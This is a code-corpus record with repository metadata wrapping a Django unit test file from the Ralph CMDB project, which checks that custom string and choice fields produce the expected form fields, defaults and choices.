| 25.658986 | 78 | 0.713182 | 893 | 5,568 | 4.142217 | 0.183651 | 0.041633 | 0.048662 | 0.043255 | 0.390105 | 0.353068 | 0.346851 | 0.344147 | 0.326845 | 0.289808 | 0 | 0.002204 | 0.185165 | 5,568 | 216 | 79 | 25.777778 | 0.813092 | 0.331897 | 0 | 0.40708 | 0 | 0 | 0.041775 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079646 | false | 0 | 0.00885 | 0.026549 | 0.176991 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10ed97d128b88ac1be3e9146a547173a352d36ad | 1,459 | py | Python | src/ralph/lib/custom_fields/tests/test_models.py | angry-tony/cmdb-ralph | eb2ad2212a133025b698eb48e379c0bfe14cace0 | [
"Apache-2.0"
] | null | null | null | src/ralph/lib/custom_fields/tests/test_models.py | angry-tony/cmdb-ralph | eb2ad2212a133025b698eb48e379c0bfe14cace0 | [
"Apache-2.0"
] | null | null | null | src/ralph/lib/custom_fields/tests/test_models.py | angry-tony/cmdb-ralph | eb2ad2212a133025b698eb48e379c0bfe14cace0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from django import forms
from django.test import TestCase
from ..models import CustomField, CustomFieldTypes
from .models import SomeModel
class CustomFieldModelsTestCase(TestCase):
def setUp(self):
self.sm1 = SomeModel.objects.create(name='abc')
self.sm2 = SomeModel.objects.create(name='def')
self.custom_field_str = CustomField.objects.create(
name='test_str', type=CustomFieldTypes.STRING,
)
self.custom_field_str_with_default = CustomField.objects.create(
name='test_str_default', type=CustomFieldTypes.STRING,
default_value='default'
)
self.custom_field_choices = CustomField.objects.create(
name='test_choices', type=CustomFieldTypes.CHOICE,
choices='qwerty|asdfgh|zxcvbn',
)
def test_get_form_field_with_default(self):
form_field = self.custom_field_str_with_default.get_form_field()
self.assertIsInstance(form_field, forms.CharField)
self.assertEqual(form_field.initial, 'default')
def test_get_form_field_choicefield(self):
form_field = self.custom_field_choices.get_form_field()
self.assertIsInstance(form_field, forms.ChoiceField)
self.assertEqual(
form_field.choices,
[
('qwerty', 'qwerty'),
('asdfgh', 'asdfgh'),
('zxcvbn', 'zxcvbn'),
]
)
| 34.738095 | 72 | 0.64976 | 154 | 1,459 | 5.909091 | 0.285714 | 0.098901 | 0.093407 | 0.059341 | 0.363736 | 0.286813 | 0.101099 | 0.101099 | 0 | 0 | 0 | 0.002732 | 0.24743 | 1,459 | 41 | 73 | 35.585366 | 0.826047 | 0.014393 | 0 | 0 | 0 | 0 | 0.077994 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.088235 | false | 0 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |